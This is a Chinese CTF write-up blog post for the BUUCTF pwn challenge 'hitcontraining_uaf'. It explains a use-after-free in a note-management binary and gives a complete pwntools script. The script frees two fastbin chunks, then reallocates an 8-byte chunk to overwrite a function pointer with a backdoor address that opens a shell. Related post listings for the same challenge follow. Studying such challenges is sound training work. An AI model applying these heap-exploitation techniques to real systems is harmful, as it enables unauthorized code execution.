hitcontraining_uaf

最新推荐文章于 2023-04-12 09:12:15 发布
最新推荐文章于 2023-04-12 09:12:15 发布
阅读量157 收藏
点赞数
分类专栏: 做题 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shidaofu/article/details/117933527
版权
这篇博客探讨了如何在C程序中利用堆管理漏洞,通过创建和释放堆块,然后添加后门,最终利用show功能调用后门函数执行shell。详细步骤包括创建fast_bin堆块,free操作,申请8字节chunk,以及如何触发后门函数。这是一个关于逆向工程和安全漏洞利用的技术分享。
摘要由CSDN通过智能技术生成

国际惯例

在这里插入图片描述

IDA

主函数没啥特别的
在这里插入图片描述有后门
在这里插入图片描述
add
在这里插入图片描述
del
在这里插入图片描述
show
在这里插入图片描述

思路

首先我们创建两个chunk,再free掉,之后add一个8字节的chunk,并添加后门,在通过show功能调用后门函数。

WP

from pwn import*
r=remote('node3.buuoj.cn',26891)

def add(size,content):
  r.sendlineafter('choice :','1')
  r.sendlineafter('Note size :',str(size))
  r.sendlineafter('Content :',content)

def free(idx):
  r.sendlineafter('choice :','2')
  r.sendlineafter('Index :',str(idx))

def show(idx):
  r.sendlineafter('choice :','3')
  r.sendlineafter('Index :',str(idx))

shell_addr=0x8048945
add(48,'aaaa')
add(48,'bbbb')
free(0)
free(1)
add(8,p32(shell_addr))
show(0)
r.interactive()

总结

首先我们创建两个fast_bin的堆块,之后free掉0、1,由于fast_bin是先进后出的进制,这样chunk0就在最下面,之后我们再申请一个8字节的chunk程序会首先把之前free掉的chunk1进行创建,之后的chunk0我们写入后很函数在通过打印调用chunk0的后门函数。(其中的chunk0、1是程序自己创建的chunk)。

没有free的

在这里插入图片描述
free之后
在这里插入图片描述
创建8字节的chunk之后
在这里插入图片描述
之后show chunk0,会调用后门函数。

shidaofu
关注
专栏目录
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 956
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
【CTF】【PWN】【UAF】【萌新友好向wp】hitcontraining_uaf
m0_50819561的博客
10-08 428
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
kernel_uaf
令则
02-14 369
kernel uaf 文章目录kernel uaf分析漏洞利用struct creduaf利用exp 分析 解包得到babydriver.ko文件, 这里其实有点奇怪,关于驱动文件我们要明白,他是常驻内核态的, 我们的程序打开这个文件描述符和读写关闭等操作会转入到这个驱动对应的函数内,我们编写用户态程序进行操作,其实是类似于我们直接去调用这些函数的。其中对应关系, 具体的关系一般要查看 data段的 file_operations, 这里说下一般遇到的常见命名方式。 open(“driver_name
[BUUCTF-pwn]——hitcontraining_uaf
Y_peak的博客
03-10 362
[BUUCTF-pwn]——hitcontraining_uaf 题目地址:https://buuoj.cn/challenges#hitcontraining_uaf 题目给了提示,一个利用UAF漏洞的题目 还是先checksec一下 在IDA中,三个比较关键的函数 我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1) delete则会将刚才申请的两块空间给删除(count不会减一
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1790
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 351
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
buuctf hitcontraining_uaf
最新发布
cainiao78777的博客
04-12 283
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
hitcontrainingUAF之我见
TedLau的博客
06-16 333
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
UAF:统一企业架构框架详解
"UAF-for-Incose" Unified Architecture Framework(UAF)是一种企业架构框架,它是Unified Profile for DoDAF and MoDAF (UPDM)的下一代版本,有时也被称为UPDM 3。UAF的设计目的是为类似于DoDAF(Department of ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值